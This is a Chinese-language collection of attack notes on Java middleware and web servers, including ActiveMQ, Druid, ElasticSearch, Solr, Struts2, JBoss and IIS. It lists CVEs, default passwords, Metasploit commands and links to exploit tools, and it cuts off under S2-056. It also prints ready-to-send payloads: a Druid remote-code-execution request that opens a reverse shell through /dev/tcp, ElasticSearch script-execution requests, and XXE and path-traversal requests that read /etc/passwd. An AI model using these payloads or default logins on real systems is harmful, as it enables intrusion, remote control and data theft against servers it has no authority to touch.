matthiaskaiser/jmet - Java Message Exploitation Tool

ActiveMQ

官网 : https://activemq.apache.org/

Fofa: Apache ActiveMQ

Apache ActiveMQ 是美国阿帕奇 (Apache) 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等.

相关文章

ActiveMQ系列漏洞汇总复现

搭建教程

ActiveMQ 搭建

默认密码

admin   admin

CVE-2015-1830 Apache ActiveMQ 5.11.1 Directory Traversal / Shell Upload

MSF Module

use exploit/windows/http/apache_activemq_traversal_upload

CVE-2015-5254 ActiveMQ 反序列化漏洞

描述
Apache ActiveMQ 5.13.0 之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的 Java Message Service(JMS)ObjectMessage 对象利用该漏洞执行任意代码.
影响版本
- Apache ActiveMQ 5.0.0 ~ 5.12.1
相关文章
- ActiveMQ 反序列化漏洞 (CVE-2015-5254)

CVE-2016-3088 ActiveMQ 任意文件写入漏洞

描述
ActiveMQ 的 web 控制台分三个应用,admin、api 和 fileserver,其中 admin 是管理员页面,api 是接口,fileserver 是储存文件的接口;admin 和 api 都需要登录后才能使用,fileserver 无需登录.
fileserver 是一个 RESTful API 接口,我们可以通过 GET、PUT、DELETE 等 HTTP 请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:
- 其使用率并不高
- 文件操作容易出现漏洞
所以,ActiveMQ 在 5.12.x~5.13.x 版本中,已经默认关闭了 fileserver 这个应用 (你可以在 conf/jetty.xml 中开启之) ;在 5.14.0 版本以后,彻底删除了 fileserver 应用.
影响版本
- Apache ActiveMQ < 5.12.x
相关文章
- ActiveMQ任意文件写入漏洞 (CVE-2016-3088)

CVE-2017-15709

描述
Apache ActiveMQ 默认消息队列 61616 端口对外，61616 端口使用了 OpenWire 协议，这个端口会暴露服务器相关信息，这些相关信息实际上是 debug 信息。会返回应用名称，JVM，操作系统以及内核版本等信息。
影响版本
- 5.14.0 < Apache ActiveMQ < 5.14.5
- 5.15.0 < Apache ActiveMQ < 5.15.2
POC | Payload | exp
```
telnet ip 61616
```

Axis

官网 : http://axis.apache.org/

Axis 是一个开源的基于 XML 的 Web 服务架构。它包含了 Java 和 C++ 语言实现的 SOAP 服务器，以及各种公用服务及 API 以生成和部署 Web 服务应用。

相关文章

Apache Axis1 与 Axis2 WebService 的漏洞利用总结

Axis-1.4-RCE

相关文章
- axis 1.4 AdminService未授权访问 jndi注入利用
POC | Payload | exp
- KibodWapon/Axis-1.4-RCE-Poc

Axis2默认弱口令

相关文章
- 【漏洞复现】Axis2默认弱口令后台Getshell

CAS

项目地址 : https://github.com/apereo/cas

Apereo CAS 4.X 反序列化漏洞

相关文章
相关工具
- 21superman/Cas_Exploit - CAS反序列化漏洞利用工具
- cL0und/cas4.x-execution-rce - exp for 4.1.x-4.1.6, 4.1.7-4.2.x, padding oracle attack
- langligelang/CAS_EXP
- MrMeizhi/ysoserial-mangguogan - ApereoCas反序列化回显与检测
- nice0e3/Cas_Exploit

Cocoon

官网 : https://cocoon.apache.org/

CVE-2020-11991 XML 注入

描述
程序使用了 StreamGenerator 这个方法时,解析从外部请求的 xml 数据包未做相关的限制,恶意用户就可以构造任意的 xml 表达式,使服务器解析达到 XML 注入的安全问题。

POC | Payload | exp

POST /v2/api/product/manger/getInfo

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>

ColdFusion

CVE-2017-3066 反序列化漏洞

POC | Payload | exp
- https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md

Druid

Alibaba_Druid

未授权访问

相关文章
- Druid未授权(弱口令)的一些利用方式
- Druid未授权漏洞实战利用
相关工具
- yuyan-sec/druid_sessions

Apache_Druid

官网 : https://druid.apache.org/

Fofa : title="Apache"&&title="Druid"

Apache Druid 是用 Java 编写的面向列的开源分布式数据存储，旨在快速获取大量事件数据，并在数据之上提供低延迟查询。

CVE-2021-25646

描述
Apache Druid 默认情况下缺乏授权认证，攻击者可以发送特制请求，利用Druid服务器上进程的特权执行任意代码。
影响版本
- Apache Druid < 0.20.1
相关文章
- Apache Druid 远程代码执行漏洞 CVE-2021-25646
- 漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)

POC | Payload | exp

POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

CVE-2021-26919

相关文章
- Apache Druid CVE-2021-26919 漏洞分析

CVE-2021-36749

POC | Payload | exp

curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"

Dubbo

官网 : https://dubbo.apache.org/zh-cn/

fofa: app="APACHE-dubbo"

Apache Dubbo 是一款高性能、轻量级的开源 Java RPC 框架，它提供了三大核心能力：面向接口的远程方法调用，智能容错和负载均衡，以及服务自动注册和发现。

相关工具

threedr3am/dubbo-exp - Dubbo 反序列化一键快速攻击测试工具，支持 dubbo 协议和 http 协议，支持 hessian 反序列化和 java 原生反序列化。

CVE-2019-17564 pache Dubbo 反序列化漏洞

CVE-2021-30179 Apache Dubbo RCE

相关文章
- CVE-2021-30179：Apache Dubbo RCE复现

CVE-2021-43297

相关文章
- Apache Dubbo Hessian2 异常处理时反序列化(CVE-2021-43297)

ElasticSearch

官网 : https://www.elastic.co/

shodan : port:9200 json

ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布式多用户能力的全文搜索引擎,基于 RESTful web 接口.Elasticsearch 是用 Java 开发的,并作为 Apache 许可条款下的开放源码发布,是当前流行的企业级搜索引擎.

未授权访问漏洞

http://[ip]:9200
http://[ip]:9200/_plugin/head/ web 管理界面
http://[ip]:9200/hello/_search?pretty&size=50&from=50
http://[ip]:9200/_cat/indices
http://[ip]:9200/_river/_search 查看数据库敏感信息
http://[ip]:9200/_nodes 查看节点数据
http://[ip]:9200/_cat/indices?v 查看当前节点的所有 Index
http://[ip]:9200/_search?pretty=true 查询所有的 index, type
Elasticvue - 进行未授权访问漏洞利用的插件

CVE-2014-3120 ElasticSearch 命令执行漏洞

描述
老版本 ElasticSearch 支持传入动态脚本 (MVEL) 来执行一些复杂的操作,而 MVEL 可执行 Java 代码,而且没有沙盒,所以我们可以直接执行任意代码.
影响版本
- ElasticSearch 1.1.1

POC | Payload | exp

来源: ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境

首先,该漏洞需要 es 中至少存在一条数据,所以我们需要先创建一条数据:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
"name": "test"
}

然后,执行任意代码:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
    "filtered": {
        "query": {
        "match_all": {
        }
        }
    }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

CVE-2015-1427 Groovy 沙盒绕过 && 代码执行漏洞

描述
CVE-2014-3120 后，ElasticSearch 默认的动态脚本语言换成了 Groovy，并增加了沙盒，但默认仍然支持直接执行动态语言。
影响版本
- ElasticSearch < 1 .3.7
- ElasticSearch 1.4.0 ~ 1.4.2
相关文章
- Remote Code Execution in Elasticsearch - CVE-2015-1427

POC | Payload | exp

来源: ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境

由于查询时至少要求 es 中有一条数据,所以发送如下数据包,增加一个数据:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
"name": "test"
}

然后发送包含 payload 的数据包,执行任意命令:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

CVE-2015-3337 目录穿越漏洞

描述
在安装了具有"site"功能的插件以后,插件目录使用 ../ 即可向上跳转,导致目录穿越漏洞,可读取任意文件.没有安装任意插件的 elasticsearch 不受影响.
影响版本
- ElasticSearch < 1.4.4
- ElasticSearch 1.5.0 ~ 1.5.1
POC | Payload | exp
来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
- http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd (不要在浏览器访问)
- http://your-ip:9200/_plugin/head/

CVE-2015-5531

描述
elasticsearch 1.5.1 及以前,无需任何配置即可触发该漏洞.之后的新版,配置文件 elasticsearch.yml 中必须存在 path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置.不配置该值,默认不启动这个功能.
影响版本
- ElasticSearch < 1.6.0
相关文章
- Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)

POC | Payload | exp

来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/

新建一个仓库

PUT /_snapshot/test HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test"
    }
}

创建一个快照

PUT /_snapshot/test2 HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
    }
}

目录穿越读取任意文件

http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

在错误信息中包含文件内容 (编码后) ,对其进行解码即可获得文件

log4j 影响

https://blog.csdn.net/u013613428/article/details/121884479

Flink

官网 : https://flink.apache.org/

Fofa: app="APACHE-Flink"

CVE-2020-17518 文件写入

相关文章
- CVE-2020-17518&17519：Flink两个漏洞复现
POC | Payload | exp
- https://github.com/QmF0c3UK/CVE-2020-17518.git

CVE-2020-17519 文件读取

相关文章
- 漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析

POC | Payload | exp

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

httpd

CVE-2007-6750 Apache ddos

描述
Apache HTTP Server 1.x版本和2.x版本中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。

MSF Module

use auxiliary/dos/http/slowloris
set RHOST <rhost>
run

CVE-2017-15715 Apache 解析漏洞

影响版本
- 2.4.0 < HTTPD <2.4.29
相关文章
- 利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
- Apache HTTPD 换行解析漏洞(CVE-2017-15715)

SSI 远程命令执行漏洞

相关文章
- Apache SSI 远程命令执行漏洞

CVE-2019-0211 Apache HTTP 服务组件提权漏洞

相关文章
- Apache 提权漏洞(CVE-2019-0211)复现
POC | Payload | exp
- CVE-2019-0211-apache

CVE-2021-40438

相关文章
- 【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现
- Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
POC | Payload | exp
- Apache CVE-2021-40438

CVE-2021-41773 Apache HTTP Server 路径穿越漏洞

相关文章
- CVE-2021-41773-Apache HTTP Server 路径穿越漏洞快速分析与复现

CVE-2021-42013 Apache任意文件读取补丁绕过

相关文章
- Apache任意文件读取补丁绕过(CVE-2021-42013)
- Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现

IIS

相关文章

Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS!

IIS shortname

描述
windows 在创建一个新文件时,操作系统还会生成 8.3 格式的兼容 MS-DOS 的(短)文件名,以允许基于 MS-DOS 或16位 windows 的程序访问这些文件.
修复方案
1. 升级 .net framework 至 4.0 版本或以上
2. 修改 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem 值 NtfsDisable8dot3NameCreation 为 1
相关文章

POC | Payload | exp

1. http://www.xxx.com/*~1*/.aspx
2. http://www.xxx.com/l1j1e*~1*/.aspx
# 若1返回404而2返回400,则可以判断目标站点存在漏洞.
http://www.xxx.com/a*~1*/.aspx
# 若存在将返回404,不存在则返回400.以此类推,不断向下猜解所有的6个字符.

Windows Server 2008 R2
查询是否开启短文件名功能:fsutil 8dot3name query
关闭该功能:fsutil 8dot3name set 1

Windows Server 2003
关闭该功能:fsutil behavior set disable8dot3 1

.Net Framework 拒绝服务攻击

描述

当请求文件夹名称包含 ~1 的请求,会导致不存在该文件的 .Net Framework 去递归查询所有根目录.如果只有一个"_{1"是无效的,当"}1"大于一个,比如像这样:

/wwwtest/fuck~1/~1/~1/~1.aspx

此时文件系统会这样调用:

\wwwtest                           SUCCESS
\wwwtest\fuck~1\~1\~1\~1           PATH NOT FOUND
\wwwtest\fuck~1                    NAME NOT FOUND
\wwwtest\fuck~1\~1\                PATH NOT FOUND
\wwwtest\fuck~1\~1\~1\             PATH NOT FOUND
\wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
\wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
\wwwtest\fuck~1\~1\~1              PATH NOT FOUND
\wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
\wwwtest\fuck~1\~1\~1              PATH NOT FOUND
\wwwtest\fuck~1\~1                 PATH NOT FOUND
\wwwtest\fuck~1                    NAME NOT FOUND
\wwwtest                           SUCCESS
\wwwtest                           SUCCESS

如果我们请求的文件/文件夹名同时存在大小写时,这个请求会被请求两次,一次是原封不动的请求,一次是全部使用小写的请求.

下表显示了每个请求的 FS 调用的数量(Windows 2008 R2, IIS 7.5(latest patch - June 2012), and .Net framework 4.0.30319 (在别的系统下可能会不同))

CVE-2017-7269 IIS6.0 RCE

描述
CVE-2017-7269 是 IIS 6.0 中存在的一个栈溢出漏洞，在 IIS6.0 处理 PROPFIND 指令的时候，由于对 url 的长度没有进行有效的长度控制和检查，导致执行 memcpy 对虚拟路径进行构造的时候，引发栈溢出，该漏洞可以导致远程代码执行。
影响版本
- IIS 6.0
- win 2003-r2
相关文章
- CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit
POC | Payload | exp
MSF Module
```
use exploit/windows/iis/cve-2017-7269
```

JBOSS

官网 : http://www.jboss.org/

相关文章

相关工具

joaomatosf/jexboss - JBoss(和其他Java反序列化漏洞)验证和利用工具

目录结构

home 文件夹

bin：该目录包含所有入口点 Java 包 (Java Archives, JAR) 和脚本, 包括启动和关闭。
client：该目录存储可能由外部 Java 客户端应用使用的配置文件。
commion：该目录包含所有服务端的通用 JAR 包及配置文件。
docs：该目录包含 JBoss 文档及模式 (schema), 它们在开发过程中非常有用。
lib：该目录包含 JBoss 启动所需的所有 JAR 包。
server：该目录包含与不同服务器配置相关的文件, 包括正式环境和测试环境。

/server/default 文件夹

conf：该目录包含配置文件, 包括 1ogin-config 及 bootstrap config。
data：该目录可用于在文件系统中存储内容的服务。
deploy：该目录包含部署在服务器上的 WAR 文件。
lib：该目录是启动时把静态 Java 类库加载到共享类路径的默认位置。
Log：该目录是所有日志写入的目录。
tmp：JBoss 使用该目录存储临时文件。
work：该目录包含编译后的 JSP 和类文件。

/server/default/deploy 文件夹

admin-console.war：是 JBoss AS 的管理控制台
ROOT. war：根 (/root) Web 应用程序。
jbossweb.sar：服务器上部署的 Tomcat Servlet 引擎。
jbossws.sar：支持 Web 服务的 JBoss 服务。

未授权访问漏洞

描述
部分版本 JBoss 默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。
- http://[ip]:8080/jmx-console

CVE-2016-7065 Red Hat JBoss EAP - Deserialization of Untrusted Data

描述
JBoss 企业应用程序平台(EAP)4和5中的 JMX servlet 允许远程 DOS，并可能通过精心设计的序列化 Java 对象执行任意代码。
影响版本
- JBOSS 4.0.0
- JBOSS 5.0.0
POC | Payload | exp
- Red Hat JBoss EAP - Deserialization of Untrusted Data

CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

描述
JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
POC | Payload | exp
- JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

CVE-2017-12149 JBoss 5.x/6.x 反序列化漏洞

描述
该漏洞为 Java 反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
影响版本
- JBOSS 5.0.0 ~ 5.2.2
POC | Payload | exp

JMXInvokerServlet 反序列化漏洞

POC | Payload | exp
- JBoss JMXInvokerServlet 反序列化漏洞

Jetty

CVE-2021-28164 && CVE-2021-28169

相关文章
- https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md
- https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md

Nacos

FOFA: title="Nacos"

CVE-2021-29441 && CVE-2021-29442 nacos v1.x authentication bypass

相关文章
- Alibaba Nacos 未授权访问漏洞
POC | Payload | exp
tips
- 大部分企业的 nacos 的 url 为 /v1/auth/users ，而不是 /nacos/v1/auth/users 可以按目标情况自行修改(from: PeiQi_WiKi)

Nacos Client Yaml反序列化

影响版本
- Nacos < 1.4.2
相关文章
- Nacos Client Yaml反序列化漏洞分析

Resin

官网 : https://caucho.com/

相关文章

针对Resin服务的攻击向量整理

Resin 任意文件读取漏洞

相关文章
- Resin任意文件读取漏洞

Resin 文件解析漏洞

相关文章
- Resin容器文件解析漏洞深入分析

Nginx

CVE-2021-23017

相关文章
- 对 Nginx DNS 解析漏洞的应急响应

RabbitMQ

Fofa: app="RabbitMQ"

默认口令

guest
guest

RocketMQ

Tips

4.0.x ~ 4.3.x 存在 fastjson 1.2.29

Shiro

Shiro

Solr

官网 : https://lucene.apache.org/solr/

Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理.

Solr 的漏洞情报参考 https://issues.apache.org/jira/projects/SOLR/issues

资源

Imanfeng/Apache-Solr-RCE - Solr RCE 整理
veracode-research/solr-injection - Apache Solr 注入研究

CVE-2017-12629 Apache solr XML 实体注入漏洞

描述
原理大致是文档通过 Http 利用 XML 加到一个搜索集合中.查询该集合也是通过 http 收到一个 XML/JSON 响应来实现.此次 7.1.0 之前版本总共爆出两个漏洞:XML 实体扩展漏洞 (XXE) 和远程命令执行漏洞 (RCE) ,二者可以连接成利用链,编号均为 CVE-2017-12629.
影响版本
- Apache solr 5.5.0 ~ 5.5.4
- Apache solr 6.0.0 ~ 6.6.1
- Apache solr 7.0.0 ~ 7.0.1
相关文章
- Apache solr XML 实体注入漏洞 (CVE-2017-12629)
- Apache Solr 远程命令执行漏洞 (CVE-2017-12629)

CVE-2019-0192 Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

https://issues.apache.org/jira/browse/SOLR-13301
描述
ConfigAPI 允许通过 HTTP POST 请求配置 Solr 的 JMX 服务器。通过将其指向恶意的 RMI 服务器，攻击者可以利用 Solr 的不安全反序列化功能在 Solr 端触发远程代码执行。
影响版本
- Apache solr 5.0.0 ~ 5.5.5
- Apache solr 6.0.0 ~ 6.6.5
POC | Payload | exp
- https://github.com/mpgn/CVE-2019-0192/

CVE-2019-0193 Apache Solr 远程命令执行漏洞

描述
此次漏洞出现在 Apache Solr 的 DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据.它具有一个功能,其中所有的 DIH 配置都可以通过外部请求的 dataConfig 参数来设置.由于 DIH 配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行.
影响版本
- Apache solr < 8.2.0
相关文章
- Apache Solr 远程命令执行漏洞 (CVE-2019-0193)
- Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
POC | Payload | exp
- jas502n/CVE-2019-0193
- 1135/solr_exploit

CVE-2019-12409

相关文章
- Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析
POC | Payload | exp
- jas502n/CVE-2019-12409

CVE-2019-17558 Apache Solr Velocity 模版注入远程命令执行漏洞

描述
2019年10月，安全研究人员放出了一个关于 solr 模板注入的 exp，攻击者通过未授权访问 solr 服务器，发送特定的数据包开启 params.resource.loader.enabled，然后 get 访问接口导致服务器命令执行，命令回显结果在 response。
影响版本
- Apache Solr < 8.2.0
相关文章
POC | Payload | exp
- jas502n/solr_rce
- SDNDTeam/CVE-2019-17558_Solr_Vul_Tool - Solr 模板注入漏洞图形化一键检测工具
- Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

CVE-2020-13957 Apche Solr 未授权上传

描述
在特定的 Solr 版本中 ConfigSet API 存在未授权上传漏洞，攻击者利用漏洞可实现远程代码执行。
影响版本
- Apache Solr 6.6.0 -6.6.5
- Apache Solr 7.0.0 -7.7.3
- Apache Solr 8.0.0 -8.6.2
相关文章

Apache Solr =< 8.8.1 任意文件读取漏洞

相关文章
- Solr任意文件读取漏洞环境搭建和复现

POC | Payload | exp

GET /solr/admin/cores?wt=json
GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream

Apache Solr<= 8.8.2 任意文件删除

相关文章
- Apache Solr<= 8.8.2 (最新) 任意文件删除

CVE-2021-27905 ssrf

POC | Payload | exp
- Henry4E36/Solr-SSRF

Spring

Spring

Struts2

官网 : https://struts.apache.org/

fofa: app="Struts2"

Struts2 的漏洞情报参考 https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

指纹

Struts
.action
.do
.action!xxxx
.c

相关工具

Lucifer1993/struts-scan - Python2 编写的 struts2 漏洞全版本检测和利用工具
HatBoy/Struts2-Scan - Python3 Struts2 全漏洞扫描利用工具
shack2/Struts2VulsTools - Struts2 系列漏洞检查工具
x51/STS2G - Golang 版 Struts2 漏洞扫描利用工具

环境搭建

wh1t3p1g/Struts2Environment - Struts2 历史版本的漏洞环境
sie504/Struts-S2-xxx - 整理收集Struts2漏洞环境
shengqi158/S2-055-PoC - S2-055的环境，基于rest-show-case改造

相关文章

Struts2 历史 RCE 漏洞回顾不完全系列

S2-016 & CVE-2013-2251

https://cwiki.apache.org/confluence/display/WW/S2-016
描述
DefaultActionMapper 类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀，但是这些前缀后面同时可以跟 OGNL 表达式，由于 struts2 没有对这些前缀做过滤，导致利用 OGNL 表达式调用 java 静态方法执行任意系统命令
影响版本
- Struts 2.0.0 ~ 2.3.15
POC | Payload | exp
- OneSourceCat/s2-016-exp

S2-020 & CVE-2014-0094 & CNNVD-201403-191

https://cwiki.apache.org/confluence/display/WW/S2-020
描述
Apache Struts 2.0.0-2.3.16 版本的默认上传机制是基于 Commons FileUpload 1.3 版本，其附加的 ParametersInterceptor 允许访问'class' 参数(该参数直接映射到 getClass() 方法)，并允许控制 ClassLoader。在具体的 Web 容器部署环境下(如：Tomcat)，攻击者利用 Web 容器下的 Java Class 对象及其属性参数(如：日志存储参数)，可向服务器发起远程代码执行攻击，进而植入网站后门控制网站服务器主机。
影响版本
- Struts 2.0.0 ~ 2.3.16.1
相关文章
- Struts2 S2-020在Tomcat 8下的命令执行分析
POC | Payload | exp
- https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Struts2/S2-020_POC.py

S2-045 & CVE-2017-5638

https://cwiki.apache.org/confluence/display/WW/S2-045
描述
恶意用户可在上传文件时通过修改 HTTP 请求头中的 Content-Type 值来触发该漏洞进而执行系统命令.
影响版本
- Struts 2.3.5 ~ 2.3.31
- Struts 2.5 ~ 2.5.10
POC | Payload | exp
- tengzhangchao/Struts2_045-Poc
- iBearcat/S2-045

S2-046 & CVE-2017-5638

https://cwiki.apache.org/confluence/display/WW/S2-046
描述
该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改 HTTP 请求头中的 Content-Type 值,构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令.
影响版本
- Struts 2.3.5 ~ 2.3.31
- Struts 2.5 ~ 2.5.10
修复方案
1. 官方已经发布版本更新,尽快升级到不受影响的版本(Struts 2.3.32 或 Struts 2.5.10.1),建议在升级前做好数据备份.
2. 临时修复方案
  在用户不便进行升级的情况下,作为临时的解决方案,用户可以进行以下操作来规避风险:在 WEB-INF/classes 目录下的 struts.xml 中的 struts 标签下添加<constant name="struts.custom.i18n.resources" value="global" />
  在 WEB-INF/classes/ 目录下添加 global.properties,文件内容如下:struts.messages.upload.error.InvalidContentTypeException=1
POC | Payload | exp
- mazen160/struts-pwn

S2-048 & CVE-2017-9791

https://cwiki.apache.org/confluence/display/WW/S2-048
描述
攻击者可以构造恶意的字段值通过 Struts2 的 struts2-struts1-plugin 插件，远程执行代码。
影响版本
- Struts 2.1.x ~ 2.3.x
POC | Payload | exp
- dragoneeg/Struts2-048

S2-052 & CVE-2017-9805

https://cwiki.apache.org/confluence/display/WW/S2-052
描述
启用 Struts REST 插件并使用 XStream 组件对 XML 进行反序列操作时，未对数据内容进行有效验证，可被攻击者进行远程代码执行攻击(RCE)。
影响版本
- Struts 2.1.6 ~ 2.3.33
- Struts 2.5 ~ 2.5.12
POC | Payload | exp
- mazen160/struts-pwn_CVE-2017-9805

S2-053 & CVE-2017-12611

https://cwiki.apache.org/confluence/display/WW/S2-053
描述
当开发者在 Freemarker 标签中使用如下代码时 <@s.hidden name=”redirectUri” value=redirectUri /><@s.hidden name=”redirectUri” value=”${redirectUri}” /> Freemarker 会将值当做表达式进行执行，最后导致代码执行。
影响版本
- Struts 2.0.0 ~ 2.3.33
- Struts 2.5 ~ 2.5.10.1
POC | Payload | exp
- brianwrf/S2-053-CVE-2017-12611

S2-055 & CVE-2017-7525

https://cwiki.apache.org/confluence/display/WW/S2-055
描述
2017年12月1日，Apache Struts 发布最新的安全公告，Apache Struts 2.5.x REST 插件存在远程代码执行的中危漏洞，漏洞编号与 CVE-2017-7525 相关。漏洞的成因是由于使用的 Jackson 版本过低在进行 JSON 反序列化的时候没有任何类型过滤导致远程代码执行。。
影响版本
- Struts 2.5 ~ 2.5.14
POC | Payload | exp
- iBearcat/S2-055

S2-056 & CVE-2018-1327

https://cwiki.apache.org/confluence/display/WW/S2-056
描述
